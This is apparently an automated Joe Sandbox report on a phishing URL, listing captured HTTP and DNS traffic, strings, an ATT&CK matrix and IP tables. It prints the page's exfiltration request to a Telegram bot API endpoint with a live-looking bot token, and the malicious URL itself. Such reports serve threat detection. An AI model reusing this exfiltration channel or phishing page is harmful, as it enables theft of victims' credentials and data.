                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: dsiete.co
                Source: global trafficDNS traffic detected: DNS query: i.ibb.co
                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessage HTTP/1.1Host: api.telegram.orgConnection: keep-aliveContent-Length: 291sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/jsoncache-control: no-cachesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://dsiete.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://dsiete.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: chromecache_57.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js
                Source: chromecache_57.2.drString found in binary or memory: https://api.ipify.org?format=json
                Source: chromecache_57.2.drString found in binary or memory: https://api.telegram.org/bot
                Source: chromecache_57.2.drString found in binary or memory: https://i.ibb.co/42sVSPG/b.png
                Source: chromecache_57.2.drString found in binary or memory: https://i.ibb.co/GkzpGyh/bg.jpg
                Source: chromecache_57.2.drString found in binary or memory: https://i.ibb.co/zr2zMVC/output-onlinepngtools.png
                Source: chromecache_57.2.drString found in binary or memory: https://ip-api.com/$
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49767 version: TLS 1.2
                Source: classification engineClassification label: mal100.phis.troj.win@16/23@20/9
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1804,i,6300371916976665629,12350350408107645027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dsiete.co/share.html"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1804,i,6300371916976665629,12350350408107645027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Browser Extensions
                1
                Process Injection
                1
                Process Injection
                OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
                Ingress Tool Transfer
                Scheduled TransferData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                https://dsiete.co/share.html100%Avira URL Cloudphishing
                https://dsiete.co/share.html100%SlashNextCredential Stealing type: Phishing & Social Engineering
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://dsiete.co/favicon.ico100%Avira URL Cloudphishing
                NameIPActiveMaliciousAntivirus DetectionReputation
                dsiete.co
                173.254.24.56
                truetrue
                  unknown
                  www.google.com
                  172.217.21.36
                  truefalse
                    high
                    api.ipify.org
                    104.26.13.205
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        i.ibb.co
                        91.134.9.160
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://dsiete.co/favicon.icofalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://dsiete.co/share.htmltrue
                            unknown
                            https://i.ibb.co/zr2zMVC/output-onlinepngtools.pngfalse
                              high
                              https://api.telegram.org/bot6385186008:AAEc-naZfzNaPfEaDEp0iUJsJ_uBvJ659NA/sendMessagefalse
                                high
                                https://i.ibb.co/GkzpGyh/bg.jpgfalse
                                  high
                                  https://i.ibb.co/42sVSPG/b.pngfalse
                                    high
                                    https://api.ipify.org/?format=jsonfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ip-api.com/$chromecache_57.2.drfalse
                                        high
                                        https://api.telegram.org/botchromecache_57.2.drfalse
                                          high
                                          https://api.ipify.org?format=jsonchromecache_57.2.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.26.12.205
                                            unknownUnited States
                                            13335CLOUDFLARENETUSfalse
                                            149.154.167.220
                                            api.telegram.orgUnited Kingdom
                                            62041TELEGRAMRUfalse
                                            91.134.9.160
                                            i.ibb.coFrance
                                            16276OVHFRfalse
                                            239.255.255.250
                                            unknownReserved
                                            unknownunknownfalse
                                            173.254.24.56
                                            dsiete.coUnited States
                                            46606UNIFIEDLAYER-AS-1UStrue
                                            172.217.21.36
                                            www.google.comUnited States
                                            15169GOOGLEUSfalse
                                            104.26.13.205
                                            api.ipify.orgUnited States
                                            13335CLOUDFLARENETUSfalse
                                            91.134.10.168
                                            unknownFrance
                                            16276OVHFRfalse
                                            IP
                                            192.168.2.4
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1567221
                                            Start date and time:2024-12-03 09:55:53 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 3m 10s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:browseurl.jbs
                                            Sample URL:https://dsiete.co/share.html
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.phis.troj.win@16/23@20/9
